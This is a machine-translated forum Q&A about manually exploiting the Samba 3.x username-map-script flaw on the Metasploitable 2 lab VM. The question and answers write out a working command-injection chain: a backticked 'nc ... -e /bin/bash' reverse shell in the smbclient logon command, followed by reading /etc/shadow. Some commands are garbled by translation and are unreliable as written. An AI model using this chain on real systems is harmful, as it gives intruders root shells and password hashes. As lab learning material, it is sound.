反向连接 Metasploitable 2 -> 没有 Metasploit 的 Kali Linux (Samba 3.x)

信息安全 元数据 kali-linux 桑巴 可转换的
2021-08-13 23:24:35

我试图在不使用 Metasploit 的情况下利用 Metasploitable 2,目的是学习。在这种情况下,我主要关注 Samba 3.x(端口 TCP 139、445)

在这个链接http://www.rwbnetsec.com/samba-3-x/ 中,在 nmap 扫描显示 TCP 端口 139 和 445 打开后,解释了两种不同的方法来利用这台机器,这些端口正在运行 Samba 版本 3.x。

第二种方法说明

此漏洞利用了 Samba 的“用户名映射脚本”功能。没有过滤用户输入,因此攻击者可以连接到 SMB 会话,并使用 shell 元字符作为用户名的输入,导致命令在远程系统上执行。这可能允许攻击者获得具有 root 访问权限的受害者机器的远程 shell。

我的问题是在使用 Metasploit 时出现的,因为它用于:

我终于找到了这个视频https://www.youtube.com/watch?v=-Y8-fZAvq9c,它避免了 Metasploit,但它对我不起作用,接下来是(Kali=192.168.200.1; Metasploitable2=192.168.200.130 ):

  1. 在终端窗口 1 中,我们将 netcat 设置为监听:

    网猫-nlvp 4444

  2. 在终端窗口 2 中,我们检查共享

    smbclient -L //192.168.200.130

  3. 我们关注 tmp 文件夹,并连接(终端 2):

    smbclient //192.168.200.130/tmp

  4. 最后,我们获得“smb:>”,其中“logon”命令用于反向连接到 Kali,如

    smb:>登录“/= nc 192.168.200.1 4444 -e /bin/bash

最后一点对我不起作用,出现以下错误消息“会话设置失败:NT_STATUS_NO_MEMORY”。

我很难找到解释“登录”命令的好手册。我尝试改变 netcat 的使用方式:

在第 1 点。我写

smb: \> nc -nlvp 4444 -e /bin/bash

在第 4 点。我写

smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"

结果相同。相同的消息错误。

我真的很想自己做,但做不到。如果您能帮助我,我将不胜感激。

先感谢您!!

2个回答

看起来您正在 smb(易受攻击的盒子)中设置您的侦听器。

smb: \> nc -nlvp 4444 -e /bin/bash

你应该做的是在你的攻击框中设置监听器。改用以下命令:

nc -nlvp 4444 

最后从您的 metasploitable2 发出命令:

logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"

对于那些与我有同样问题的人,我会根据之前的答案以及此链接Metasploitable 2 - Samba来回答我是如何解决的

要遵循的步骤是:

  1. 我们打开终端窗口 1,我们将 netcat 设置为监听:

    netcat -nlvp 4444

  2. 我们打开终端窗口 2,我们检查受害者共享:

    smbclient -L //192.168.200.130

  3. (终端2)我们关注tmp文件夹,并连接到受害者:

    smbclient //192.168.200.130/tmp

  4. (Terminal 2) 最后,我们得到smb: >命令logon用于反向连接到 Kali 的位置,如

    smb:\>登录“/=`nc 192.168.200.1 4444 -e /bin/bash`”

小心:不要忘记后面的勾号。

  1. (终端 1)我们可以看到已建立的连接并可以插入我们想要的命令。例子:

    • id
    • hostname
    • uname -a
    • cat /etc/shadow

提示密码时,只需单击输入(留空)。